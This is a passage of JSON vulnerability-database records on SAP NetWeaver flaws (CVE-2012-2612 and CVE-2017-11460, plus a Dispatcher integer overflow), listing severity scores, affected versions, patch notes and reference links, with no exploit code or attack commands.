"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"db": "NVD",
"id": "CVE-2012-2612"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2612"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security - Corelabs",
"sources": [
{
"db": "BID",
"id": "53424"
}
],
"trust": 0.3
},
"cve": "CVE-2012-2612",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-2612",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-2612",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201205-234",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2012-2612",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2612"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"db": "NVD",
"id": "CVE-2012-2612"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2612"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "VULMON",
"id": "CVE-2012-2612"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=20705",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2612"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-2612",
"trust": 2.8
},
{
"db": "SECTRACK",
"id": "1027052",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002406",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201205-234",
"trust": 0.6
},
{
"db": "BID",
"id": "53424",
"trust": 0.3
},
{
"db": "EXPLOIT-DB",
"id": "20705",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-2612",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2612"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"db": "NVD",
"id": "CVE-2012-2612"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
]
},
"id": "VAR-201205-0128",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.2949160133333333
},
"last_update_date": "2023-12-18T12:22:02.637000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2612"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"db": "NVD",
"id": "CVE-2012-2612"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1027052"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2612"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2612"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=34857"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/20705/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2612"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"db": "NVD",
"id": "CVE-2012-2612"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2012-2612"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"db": "NVD",
"id": "CVE-2012-2612"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-05-15T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2612"
},
{
"date": "2012-05-08T00:00:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"date": "2012-05-15T04:21:43.597000",
"db": "NVD",
"id": "CVE-2012-2612"
},
{
"date": "2012-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-29T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2612"
},
{
"date": "2012-09-04T05:50:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002406"
},
{
"date": "2017-12-29T02:29:19.127000",
"db": "NVD",
"id": "CVE-2012-2612"
},
{
"date": "2012-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of DiagTraceHex Service disruption in functions ( Daemon crash ) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002406"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-234"
}
],
"trust": 0.6
}
}
var-201707-0533
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in the DataArchivingService servlet in SAP NetWeaver Portal 7.4 allows remote attackers to inject arbitrary web script or HTML via the responsecode parameter to shp/shp_result.jsp, aka SAP Security Note 2308535. Vendors have confirmed this vulnerability SAP Security Note 2308535 It is released as.Information may be obtained and information may be altered. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-0533",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver portal",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "portal 7.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "97565"
},
{
"db": "BID",
"id": "101826"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"db": "NVD",
"id": "CVE-2017-11460"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_portal:7.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11460"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "97565"
},
{
"db": "BID",
"id": "101826"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
],
"trust": 1.2
},
"cve": "CVE-2017-11460",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-11460",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-11460",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-11460",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-869",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"db": "NVD",
"id": "CVE-2017-11460"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in the DataArchivingService servlet in SAP NetWeaver Portal 7.4 allows remote attackers to inject arbitrary web script or HTML via the responsecode parameter to shp/shp_result.jsp, aka SAP Security Note 2308535. Vendors have confirmed this vulnerability SAP Security Note 2308535 It is released as.Information may be obtained and information may be altered. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11460"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"db": "BID",
"id": "97565"
},
{
"db": "BID",
"id": "101826"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-11460",
"trust": 3.0
},
{
"db": "BID",
"id": "101826",
"trust": 1.9
},
{
"db": "BID",
"id": "97565",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006463",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-869",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "97565"
},
{
"db": "BID",
"id": "101826"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"db": "NVD",
"id": "CVE-2017-11460"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
]
},
"id": "VAR-201707-0533",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:44:30.505000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "April 2017 (2308535)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
},
{
"title": "SAP NetWeaver Portal Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=91646"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"db": "NVD",
"id": "CVE-2017-11460"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/101826"
},
{
"trust": 1.2,
"url": "http://www.sap.com"
},
{
"trust": 1.1,
"url": "https://erpscan.com/advisories/erpscan-17-016-sap-netweaver-java-7-4-dataarchivingservice-servlet-xss/"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/97565"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-17-016-sap-netweaver-java-7-4-dataarchivingservice-servlet-xss/"
},
{
"trust": 0.9,
"url": "https://service.sap.com/sap/support/notes/2464582"
},
{
"trust": 0.9,
"url": "https://blogs.sap.com/2017/11/14/sap-security-patch-day-november-2017/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11460"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-11460"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2308535"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "97565"
},
{
"db": "BID",
"id": "101826"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"db": "NVD",
"id": "CVE-2017-11460"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "97565"
},
{
"db": "BID",
"id": "101826"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"db": "NVD",
"id": "CVE-2017-11460"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-11T00:00:00",
"db": "BID",
"id": "97565"
},
{
"date": "2017-11-14T00:00:00",
"db": "BID",
"id": "101826"
},
{
"date": "2017-08-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"date": "2017-07-25T18:29:01.197000",
"db": "NVD",
"id": "CVE-2017-11460"
},
{
"date": "2017-07-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-26T17:08:00",
"db": "BID",
"id": "97565"
},
{
"date": "2019-04-12T22:00:00",
"db": "BID",
"id": "101826"
},
{
"date": "2017-08-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006463"
},
{
"date": "2018-12-10T19:29:19.843000",
"db": "NVD",
"id": "CVE-2017-11460"
},
{
"date": "2019-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-869"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "97565"
},
{
"db": "BID",
"id": "101826"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Portal Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006463"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "97565"
},
{
"db": "BID",
"id": "101826"
}
],
"trust": 0.6
}
}
var-201409-1160
Vulnerability from variot
SAP NetWeaver is the technical foundation of SAP's integrated technology platform and all SAP applications since SAP Business Suite. An integer overflow vulnerability exists in SAP NetWeaver Dispatcher. An attacker exploits a vulnerability to conduct a denial of service attack
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201409-1160",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
